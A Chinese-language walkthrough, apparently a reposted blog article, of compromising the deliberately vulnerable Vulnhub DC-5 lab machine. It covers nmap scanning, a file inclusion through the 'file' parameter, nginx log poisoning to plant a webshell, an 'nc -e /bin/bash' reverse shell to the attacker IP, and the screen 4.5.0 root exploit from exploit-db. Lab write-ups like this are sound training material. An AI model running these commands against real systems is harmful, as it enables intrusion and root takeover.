DC-5靶机解题思路

  • A+
所属分类:安全文章

说明:Vulnhub是一个渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习,实践。DC-5全程只有一个falg,获取root权限,以下内容是自身复现的过程,总结记录下来,如有不足请多多指教


下载地址:

Download (Mirror): 

https://download.vulnhub.com/dc/DC-5.zip


目标机IP地址:192.168.5.140
攻击机kali IP地址:192.168.5.135


arp-scan -l 发现目标ip。

DC-5靶机解题思路


nmap端口扫描,开发了80端口。

nmap -sV -p- 192.168.5.140

DC-5靶机解题思路


访问80端口。

DC-5靶机解题思路


观察到版权标识后的年份刷新后会发生变化,怀疑是该站点有文件包含漏洞,包含了某个文件,然后渲染到页面中。

DC-5靶机解题思路

DC-5靶机解题思路


爆破后得知该页面通过可控参数file来包含其他文件。

http://192.168.5.140/thankyou.php?file=/etc/passwd 

确定存在文件包含漏洞。

DC-5靶机解题思路


/var/log/nginx/error.log Nginx日志文件,将一句话写入到日志文件里。

写入一句话成功后,蚁剑链接。

DC-5靶机解题思路

DC-5靶机解题思路


反弹shell。

 nc -e /bin/bash 192.168.5.135 7777

 并转换交互模式。

python -c 'import pty;pty.spawn("/bin/bash")'  

DC-5靶机解题思路

DC-5靶机解题思路


查找一下可以用root权限运行的命令;

find / -perm -u=s -type f 2>/dev/null

DC-5靶机解题思路


发现 screen 4.5.0, screen 4.5.0 是由提权漏洞的,搜索利用方式。

DC-5靶机解题思路


搜索文件位置查看利用方式。

/usr/share/exploitdb/exploits/linux/local/41154.sh

chmod 777 41154.sh 

重新设置文件格式。

:set:ff 回车

:set ff=unix

:wq

41154.sh脚本中分三部分,将第一部分、第二部分的c语言代码抽离,独立保存,根据里面的提示进行编译。

DC-5靶机解题思路


将第一部分C语言代码保存到libhax.c。

DC-5靶机解题思路


根据提示进行编译,编译后删除源文件。

gcc -fPIC -shared -ldl -o libhax.so libhax.c 

DC-5靶机解题思路

 

把下面部分c语言代码也单独复制出来取文件名为rootshell.c。

DC-5靶机解题思路


根据提示进行编译,编译后删除源文件。

gcc -o rootshell rootshell.c

DC-5靶机解题思路


41154.sh 进行修改,并且改名为dc5.sh。

DC-5靶机解题思路


开启ftp服务:

apt-get install vsftpd

vsftpd服务开启ftp。

DC-5靶机解题思路

DC-5靶机解题思路


查看文件的权限。/tmp下文件可任意读写,ftp链接,将编译好的文件下载到本地/tmp下。

DC-5靶机解题思路

DC-5靶机解题思路

DC-5靶机解题思路

DC-5靶机解题思路


chmod +x dc5.sh 执行权限,然后执行。/dc5.sh 获取root权限。

DC-5靶机解题思路

DC-5靶机解题思路


免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

DC-5靶机解题思路

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

DC-5靶机解题思路


本文始发于微信公众号(thelostworld):DC-5靶机解题思路

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: